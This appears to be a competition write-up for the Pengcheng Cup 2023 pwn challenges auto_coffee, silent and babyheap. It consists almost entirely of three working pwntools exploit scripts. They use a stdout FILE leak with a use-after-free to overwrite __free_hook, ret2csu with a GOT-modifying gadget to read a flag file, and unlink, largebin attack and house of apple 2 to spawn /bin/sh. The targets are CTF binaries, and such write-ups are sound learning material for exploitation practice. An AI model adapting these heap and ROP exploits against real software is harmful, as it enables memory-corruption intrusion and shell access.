鹏城杯2023-pwn

p/x *stdout

auto_coffee

stdout_attack + uaf

# _*_ coding:utf-8 _*_
	from pwn import *
	import re
	import os, struct, random, time, sys, signal
	import hashlib
	from hashlib import sha256

	# p = remote("172.16.7.10","13944")
	p = process("./pwn")
	elf = ELF("./pwn")
	libc = elf.libc

	context.log_level = "debug" # info
	context.arch = elf.arch
	context.terminal = ['tmux', 'splitw', '-hp','55']

	def g(breakpoint = ''):
	    gdbbreakpt = 'b *{}'.format(hex(breakpoint))
	    gdb.attach(p,gdbbreakpt)
	def gg(breakpoint = ''):
	    gdbbreakpt = 'b *rebase({})'.format(hex(breakpoint))
	    gdb.attach(p,gdbbreakpt)
	def info(name, base):
	    print('\033[44m'+str(name)+"----->"+hex(base)+'\033[0m')

	#-----------------------------------------------------------------------------------------
	s       = lambda data               :p.send(str(data))
	sa      = lambda text,data          :p.sendafter(text, str(data))
	sl      = lambda data               :p.sendline(str(data))
	sla     = lambda text,data          :p.sendlineafter(text, str(data))
	r       = lambda num=4096           :p.recv(num)
	ru      = lambda text               :p.recvuntil(text)
	ia      = lambda                    :p.interactive()
	hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
	l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
	l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
	uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
	uu64    = lambda                    :u64(p.recv(6).ljust(8,b'\x00'))
	int16   = lambda data               :int(data,16)
	lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
	# sc      = lambda                    :shellcraft.amd64.linux.sh()
	#-----------------------------------------------------------------------------------------

	# p1 = str(4421)
	# sla('>>>', p1)

	# # g(0x000000000401D9A)
	# passwd = 'just pwn it'
	# sla('please input the admin password', passwd)
	# g(0x000000000401D9A)
	def exit():
	    sla('>>>', str(3))

	def show():
	    sla('>>>', str(2))# g(0x000000000401D9A) 

	def root():
	    p1 = str(4421)
	    sla('>>>', p1)# g(0x000000000401D9A)
	    passwd = 'just pwn it'
	    sla('please input the admin password', passwd)

	def rep(id):
	    r1 = str(1)
	    sla('>>>', r1)
	    sla('>>>', str(id))
	    

	def chg(id, coffee, con):
	    r1 = str(2)
	    sla('>>>', r1)
	    r2 = str(id)
	    sla('>>>', r2)
	    r3 = coffee
	    sla('>>>', r3)
	    sa('input your content', con)

	def exit():
	    r1 = str(3)
	    sla('>>>', r1)

	def buy(id, con):
	    sla('>>>', 1)
	    sa("input the id of what coffee you want to buy", str(id))
	    p.recvuntil("Do you want to add something?Y/N")
	    p.sendline(b'y')
	    sla("Ok,please input what you need in coffee", con)

	# root()

	# for i in range(7):
	    # buy(1, b'aaaa')
	buy(2, b'aaaa')
	buy(2, b'aaaa')

	root()
	# g(0x0000000000401CEE)
	# pay = p64(0xfbad1800) + p64(0)*4 + p8(8)
	pay = "\x00\x18\xad\xfb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08" 
	chg(1, -0x20 + 1, pay)

	libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00")) - 0x1eb980
	# libc_base = uu64()
	print(hex(libc_base))

	system = libc_base + libc.sym['system']
	free_hook = libc_base + libc.sym['__free_hook']
	print(hex(system))
	print(free_hook)


	sla('>/>>', str(2))
	# sla('>>>', str(2))
	# sla('>>>', str(2))
	# sla('input your content', p64(free_hook))
	chg(2, 2, p64(free_hook))
	rep(2)

	chg(2,2,p64(system))
	buy(1,b"/bin/sh\x00")


	g(0x0000000000401CE9)



	p.interactive()

silent

ret2csu + magic gadget(直接修改got表)

# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

# p = remote("172.16.7.10","13944")
p = process("./pwn")
elf = ELF("./pwn")
libc = elf.libc

context.log_level = "debug" # info
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp','55']

def g(breakpoint = ''):
    gdbbreakpt = 'b *{}'.format(hex(breakpoint))
    gdb.attach(p,gdbbreakpt)
def gg(breakpoint = ''):
    gdbbreakpt = 'b *rebase({})'.format(hex(breakpoint))
    gdb.attach(p,gdbbreakpt)
def info(name, base):
    print('\033[44m'+str(name)+"----->"+hex(base)+'\033[0m')

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------

ret2csu_front = 0x0000000000400940
ret2csu_behind = 0x000000000040095A
magic_gadget = 0x00000000004007e8
# add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
bss = 0x602000
# print(hex(bss))
stdout_got = 0x601020

def set_offset(target,raw):
    offset = target - raw
    if offset < 0:
        offset = offset + 0x100000000
    return offset

def set_vuln(offset,target):
    payload = flat([
        ret2csu_behind,
        offset,
        target+0x3d,
        0,0,0,0,
        magic_gadget,
    ])
    return payload


def ret2csu(rdi,rsi,rdx,vuln):
    payload = flat([
        ret2csu_behind,
        0,1,
        vuln,
        rdi,rsi,rdx,
        ret2csu_front,
        0,0,0,0,0,0,0,
    ])
    return payload

print(hex(libc.sym['write']))
print(hex(libc.sym['_IO_2_1_stdout_']))
print(hex(libc.sym['write']-libc.sym['_IO_2_1_stdout_']))
print(hex(set_offset(libc.sym['write'], libc.sym['_IO_2_1_stdout_'])))
# g(0x00000000004007e8)
pay1 = b'a'*0x48 + ret2csu(0,bss,0x300,elf.got['read']) + p64(0x400878)
pay1 = pay1.ljust(0x100, b'a')
p.send(pay1)

pay2 = b'./flag\x00\x00' + set_vuln(set_offset(libc.sym['open'], libc.sym['_IO_2_1_stdout_']),stdout_got)
pay2 += ret2csu(bss, 0, 0, stdout_got)
pay2 += ret2csu(3,bss+0x500,0x40,elf.got['read'])
pay2 += set_vuln(set_offset(libc.sym['write'],libc.sym['open']),stdout_got)
pay2 += ret2csu(1, bss+0x500, 0x40, stdout_got)
pay2 = pay2.ljust(0x300, b'\x00')
# g(0x40095b)

p.send(pay2)

pay3 = b'a'*(0x40) + p64(bss) + p64(0x400876)
pay3 = pay3.ljust(0x100, b'\x00')
p.send(pay3)
p.interactive()

babyheap

unlink + largebin attack + house of apple 2

# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

# p = remote("172.16.7.10","13944")
p = process("./pwn")
elf = ELF("./pwn")
libc = elf.libc

context.log_level = "debug" # info
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp','55']

def g(breakpoint = ''):
    gdbbreakpt = 'b *{}'.format(hex(breakpoint))
    gdb.attach(p,gdbbreakpt)
def gg(breakpoint = ''):
    gdbbreakpt = 'b *$rebase({})'.format(hex(breakpoint))
    gdb.attach(p,gdbbreakpt)
def info(name, base):
    print('\033[44m'+str(name)+"----->"+hex(base)+'\033[0m')

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------
def menu(ch):
    p.sendlineafter(b">> \n",str(ch).encode())

def add(size,content=b"/bin/sh\x00"):
    menu(1)
    p.sendlineafter(b"size\n",str(size).encode())
    if len(content)<size:
        content+=b"\n"
    p.sendafter(b"name\n",content)

def edit(idx,size,content):
    menu(2)
    p.sendlineafter(b"index\n",str(idx).encode())
    p.sendlineafter(b"size\n",str(size).encode())
    p.sendlineafter(b"name\n",content)

def show(idx,):
    menu(3)
    p.sendlineafter(b"index\n",str(idx).encode())
    # return p.recvline()[:-1]

def delete(idx):
    menu(4)
    p.sendlineafter(b"index\n",str(idx).encode())


ru(b'0x')
heap_base = int(r(12),16) - 0x2a0
print(hex(heap_base))


for i in range(4):
    add(0x428,b'123')
add(0x4f8, b'456')
add(0x408, b'456')#5
edit(3,0x428,b"a"*0x420+p64(0x10b0))

edit(0,0x428,flat([
    0,0x10b1,
    heap_base+0x2e0-0x20,heap_base+0x2e0-0x20,
    0,0,
    # heap_base+0x2c0,heap_base+0x2c0,
]))
# gg(0x00000000000017DA)
delete(4)
add(0x418, b'bcbcbcbc')#4
# show(0)
for i in range(3):
    add(0x428)
add(0x4f8)
delete(3)
add(0x438)

show(8)
libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00")) - 0x1ff0f0
print(hex(libc_base))

IO_list = libc_base + libc.sym["_IO_list_all"]
pay1 = p64(0)*3 + p64(IO_list - 0x20)
edit(8,0x20,pay1)
delete(4)
add(0x458)


iostru_base=heap_base+0x2c0
ropp=ROP(libc)
leave_ret=ropp.find_gadget(["leave","ret"])[0] + libc_base
rbp=ropp.find_gadget(["pop rbp","ret"])[0] + libc_base
rsp=ropp.find_gadget(["pop rsp","ret"])[0]  + libc_base
print(hex(rbp))
fakeio=FileStructure()
fakeio.vtable=libc.sym["_IO_wfile_jumps"] + libc_base
fakeio._IO_write_base=0
fakeio._IO_write_ptr=1
fakeio.flags=u32(b"  sh")
fakeio._wide_data= heap_base+0x6f0
fakeio.chain=leave_ret
fakeio._codecvt = iostru_base
fakeio._lock=libc_base + 0x2008e0
fakeio=bytes(fakeio)
edit(0,len((fakeio)),(fakeio))

rdi=ropp.find_gadget(["pop rdi","ret"])[0] + libc_base
print(hex(rdi))
binsh=libc.search(b"/bin/sh").__next__() + libc_base
print(hex(binsh))
system = libc_base + libc.sym['system']
print(hex(system))

rop_chain=flat({
    0x40:[rdi,binsh,system],
    0x60:[system],
    0xe0:[heap_base+0x6f0+0x60-0x68]
},filler=b"\x00")
edit(1,len(rop_chain),rop_chain)

stack_pivot=flat({
    8: heap_base+0,
    0x20: libc.sym['setcontext'] + libc_base +61,
    0xa0: heap_base+0x6f0+0x40,
},filler=b"\x00")

# edit(4,len(stack_pivot),stack_pivot)

print(hex(leave_ret))
gg(0)
sa(">>", str(5))


# gg(0)



p.interactive()